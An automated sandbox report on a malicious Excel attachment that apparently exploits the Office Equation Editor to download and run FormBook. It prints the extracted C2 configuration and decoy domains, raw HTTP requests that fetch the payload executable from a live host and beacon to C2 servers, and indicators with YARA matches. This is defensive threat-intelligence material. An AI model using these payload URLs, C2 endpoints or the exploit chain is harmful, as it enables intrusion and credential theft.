Windows Analysis Report SWIFT - Copy - Copy.xlsx

AV Detection:

Found malware configuration

Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}

Yara detected FormBook

Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://mikeloayza.com/E9/i4L.exe	Avira URL Cloud: Label: malware
Source: https://mikeloayza.com/E9/i4L.exe	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: SWIFT - Copy - Copy.xlsx

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\Public\Pcportk28.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.Pcportk28.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Pcportk28.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Pcportk28.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
Source:	Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: mikeloayza.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\Pcportk28.exe	Code function: 4x nop then pop ebx		5_2_00406AB6
Source: C:\Users\Public\Pcportk28.exe	Code function: 4x nop then pop edi		5_2_0040C3FB
Source: C:\Users\Public\Pcportk28.exe	Code function: 4x nop then pop edi		5_2_0041565B
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 4x nop then pop edi		7_2_000EC3FB
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 4x nop then pop edi		7_2_000F565B
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 4x nop then pop ebx		7_2_000E6AB6

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 131.153.37.4:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 131.153.37.4:443

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.executive-air.net
Source: C:\Windows\explorer.exe	Domain query: www.bitcointradel.com
Source: C:\Windows\explorer.exe	Network Connect: 162.0.209.73 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.freeadakahamazon.com
Source: C:\Windows\explorer.exe	Network Connect: 118.67.131.217 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.fisioletsgo.com
Source: C:\Windows\explorer.exe	Domain query: www.luckyfandom.com
Source: C:\Windows\explorer.exe	Network Connect: 216.239.34.21 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.healingandhealthy.com/i6ro/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: CLEAR-AS-APClearNetworksPtyLtdAU CLEAR-AS-APClearNetworksPtyLtdAU
Source: Joe Sandbox View	ASN Name: SSASN2US SSASN2US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1Host: www.fisioletsgo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1Host: www.bitcointradel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1Host: www.executive-air.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1Host: www.luckyfandom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 118.67.131.217 118.67.131.217

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: mikeloayza.com
Source: global traffic	HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mikeloayza.comConnection: Keep-Alive

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 15:06:04 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: mikeloayza.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: mikeloayza.com
Source: global traffic	HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mikeloayza.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1Host: www.fisioletsgo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1Host: www.bitcointradel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1Host: www.executive-air.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1Host: www.luckyfandom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\Pcportk28.exe			Jump to dropped file

Yara signature match

